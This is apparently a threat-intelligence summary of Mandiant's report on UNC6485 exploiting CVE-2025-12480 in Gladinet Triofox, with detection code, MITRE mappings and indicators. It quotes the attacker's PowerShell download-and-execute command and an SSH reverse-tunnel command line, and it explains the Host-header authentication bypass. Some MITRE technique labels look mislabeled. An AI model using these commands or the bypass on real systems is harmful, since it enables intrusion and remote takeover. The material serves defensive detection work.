Mandiant discovered UNC6485 exploiting an unauthenticated access vulnerability (CVE-2025-12480) in Gladinet Triofox that allowed attackers to bypass authentication, create an admin account, and achieve code execution by abusing the built-in anti‑virus feature. The actor used that access to deploy a Zoho UEMS installer, install remote access tools (Zoho Assist, AnyDesk), and establish an SSH reverse tunnel for RDP access. #CVE-2025-12480 #UNC6485 #Triofox
Key points
- Mandiant identified exploitation of an unauthenticated access control flaw in Gladinet Triofox (version 16.4.10317.56372) that was patched in 16.7.10368.56560 (CVE-2025-12480).
- The vulnerability stemmed from trusting the HTTP Host header (Request.Url.Host) and granting access when it equaled “localhost”, allowing host header spoofing to reach setup pages.
- UNC6485 used the setup workflow to create a native admin account “Cluster Admin” and then configured Triofox’s anti‑virus engine path to point to a malicious batch script, which executed as SYSTEM.
- The attacker’s batch script downloaded a disguised Zoho UEMS installer from 84.200.80[.]252 and used the legitimate agent to deploy Zoho Assist and AnyDesk for remote access.
- Defense-evasion and persistence included renamed tunneling tools (sihosts.exe, silcon.exe), use of Plink/PuTTY to create an SSH reverse tunnel to 216.107.136[.]46 forwarding RDP, and attempts to modify account passwords and group membership.
- Mandiant and Google SecOps detections and UDM hunting queries are provided to detect Gladinet/Triofox process spawning, suspicious file activity, PowerShell download-and-execute behavior, and reverse SSH tunneling.
- Recommended mitigations: upgrade Triofox to the patched release, audit admin accounts, verify anti‑virus engine configuration cannot execute arbitrary scripts, and hunt for anomalous outbound SSH and renamed tunneler executables.
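The Host-header check behind CVE-2025-12480, as an added hunting example that is not code from the Mandiant post or from Gladinet: it parses constructed IIS-style log lines (the field layout, with the optional cs-host field enabled, is an assumption) and flags requests that claim Host=localhost but arrive from a non-loopback client.

```python
"""Hunt IIS-style web logs for CVE-2025-12480 exploitation attempts.
Added example, not code from the Mandiant post or from Gladinet. The flaw granted
access to the setup pages when the Host header read "localhost", so a request whose
Host header is localhost but whose client address is not loopback is a spoofing
attempt. Field order is an assumption: a W3C log with the optional cs-host field."""
import ipaddress

# Constructed sample log, not real traffic; fields as in the header line.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-host sc-status
2025-08-24 10:01:12 203.0.113.10 GET /login.aspx triofox.example.com 200
2025-08-24 10:02:45 203.0.113.10 GET /AdminDatabase.aspx localhost 200
2025-08-24 10:02:59 203.0.113.10 POST /AdminDatabase.aspx localhost 302
2025-08-24 10:03:10 127.0.0.1 GET /AdminDatabase.aspx localhost 200
2025-08-24 10:05:00 198.51.100.7 GET /AdminDatabase.aspx triofox.example.com 403
"""

SETUP_PAGES = {"/admindatabase.aspx"}            # page named in the write-up
LOCAL_HOSTS = {"localhost", "127.0.0.1"}         # header values the flawed check trusted

def is_loopback(ip: str) -> bool:
    """True only for a genuine loopback socket address, never for a header value."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False

def spoofed_local_requests(log_text: str) -> list:
    """Return requests that claim Host=localhost but arrive from a non-loopback client."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, c_ip, method, uri, host, status = parts[:7]
        # Strip an optional :port before comparing the Host value.
        if host.lower().split(":")[0] in LOCAL_HOSTS and not is_loopback(c_ip):
            hits.append({"time": f"{date} {time}", "client": c_ip, "method": method,
                         "uri": uri, "status": status,
                         "setup_page": uri.lower() in SETUP_PAGES})
    return hits
```

The same rule is the server-side fix: decide "local" from the socket's remote address, never from a client-supplied header.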
MITRE Techniques
- [T1189] Drive-by Compromise – Attacker exploited an unauthenticated access control vulnerability (host header spoofing) to reach setup pages and create an admin account: “…Changing the Host value to localhost grants access to the AdminDatabase.aspx page.”
- [T1190] Exploit Public-Facing Application – CVE-2025-12480 was exploited to bypass authentication and access configuration pages: “…this now-patched n-day vulnerability…allowed an attacker to bypass authentication and access the application configuration pages…”
- [T1543.003] Create or Modify System Process: Windows Service – Attacker used the Triofox anti‑virus configuration to execute a malicious batch script as SYSTEM by pointing the anti‑virus path to the script: “…the file configured as the anti-virus scanner location inherits the Triofox parent process account privileges, running under the context of the SYSTEM account.”
- [T1218] Signed Binary Proxy Execution – Attacker downloaded and executed a legitimate Zoho UEMS installer to deploy remote access tools, using a trusted installer to run subsequent tooling: “…The executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer.”
- [T1105] Ingress Tool Transfer – The attacker’s PowerShell downloader retrieved a payload from http://84.200.80[.]252 and saved it to C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe: “…$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip'; $out = 'C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe'; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList '/silent' -Wait”
- [T1021.004] Remote Services: SMB/Windows Admin Shares – Attacker enumerated active SMB sessions and local/domain user information via remote access tools to perform reconnaissance and privilege escalation: “The attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain user information.”
- [T1090.001] Proxy: External Proxy – Attacker used Plink/PuTTY (renamed to sihosts.exe/silcon.exe) to create an SSH reverse tunnel over port 433 to 216.107.136[.]46 that forwarded RDP back to the compromised host, enabling inbound remote desktop access: “These tools were used to set up an encrypted tunnel…forward all traffic over the tunnel to the compromised host on port 3389.”
- [T1071.001] Web Protocols – PowerShell Invoke-WebRequest was used to download the UEMS payload over HTTP from 84.200.80[.]252: “…Invoke-WebRequest -Uri $url -OutFile $out;”
- [T1566.001] Phishing (credential access via account creation abuse) – While not traditional phishing, the attacker abused the application setup workflow to create admin credentials and gain initial access: “…used these pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin…”
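Endpoint-side detection for the chain in the list above (a Triofox process spawning the batch script, the PowerShell download-and-execute, the renamed Plink binary, the reverse tunnel forwarding RDP), as an added example that is not code from Mandiant or Google SecOps; the events, their field names and the Triofox install path are constructed assumptions.

```python
"""Triage process-creation events for the UNC6485 tradecraft described above.
Added example, not code from Mandiant or Google SecOps. Events are constructed,
Sysmon-style records; field names and the Triofox install path are assumptions."""
import re

TRIOFOX_MARKERS = ("triofox", "gladinet")   # substrings expected in the parent image path
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
TUNNELERS = {"plink.exe", "putty.exe"}      # OriginalFileName from the PE version resource
PS_DOWNLOAD_EXEC = re.compile(r"(invoke-webrequest|\biwr\b).*start-process", re.I)
SSH_REVERSE_RDP = re.compile(r"\s-R\s+\S*3389")

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list:
    """Return the detection tags that apply to one process-creation event."""
    image, parent = _basename(ev.get("Image", "")), ev.get("ParentImage", "").lower()
    cmd, orig = ev.get("CommandLine", ""), ev.get("OriginalFileName", "").lower()
    tags = []
    # 1. A Triofox process spawning a shell or a .bat: the anti-virus engine path abuse.
    if any(m in parent for m in TRIOFOX_MARKERS) and (image in SHELLS or ".bat" in cmd.lower()):
        tags.append("triofox_spawned_shell")
    # 2. PowerShell download-and-execute chain (Invoke-WebRequest ... Start-Process).
    if image in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD_EXEC.search(cmd):
        tags.append("ps_download_execute")
    # 3. Renamed tunneler: the binary identifies itself as plink/putty but carries another name.
    if orig in TUNNELERS and image not in TUNNELERS:
        tags.append("renamed_tunneler")
    # 4. SSH reverse tunnel (-R) forwarding RDP (3389) back to the compromised host.
    if SSH_REVERSE_RDP.search(cmd):
        tags.append("ssh_reverse_tunnel_rdp")
    return tags

# Constructed events, not real telemetry; PAYLOAD_HOST / TUNNEL_HOST are placeholders.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Program Files\Triofox\TriofoxServer.exe",   # assumed install path
     "CommandLine": r'cmd.exe /c "C:\triofox\centre_report.bat"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell $url='http://PAYLOAD_HOST/SAgentInstaller.zip'; "
                    "$out='C:\\Windows\\appcompat\\SAgentInstaller.exe'; "
                    "Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -Wait"},
    {"Image": r"C:\Windows\Temp\sihosts.exe", "OriginalFileName": "plink.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sihosts.exe -ssh -P 433 -R 3389:127.0.0.1:3389 user@TUNNEL_HOST"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell Get-Process"},
]
```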
Indicators of Compromise
- [IP Address] attacker and hosting infrastructure – 85.239.63[.]37 (initial exploit), 65.109.204[.]197 (subsequent login), 84.200.80[.]252 (payload host), 216.107.136[.]46 (Plink C2).
- [File Hash – SHA256] malicious and tool artifacts – SAgentInstaller_16.7.10368.56560.exe: 43c455274d41e58132be7f66139566a941190ceba46082eb2ad7a6a261bfd63f; sihosts.exe (Plink): 50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7.
- [File Hash – SHA256] additional tool/harness examples – silcon.exe (PuTTY): 16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad; file.exe (AnyDesk): ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7c6a9a4eace2f.
- [File Path / Filename] local artifacts and scripts – C:\triofox\centre_report.bat (attacker batch script) executed via the anti‑virus path; C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe (downloaded installer).
- [Domain / URL] downloader location – http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip, which hosted the disguised installer; related web-log indicators are suspicious HTTP GET requests with unusual Referer headers (e.g., requests with the Host header set to localhost arriving from external IPs such as 85.239.63[.]37).
Read more: https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480/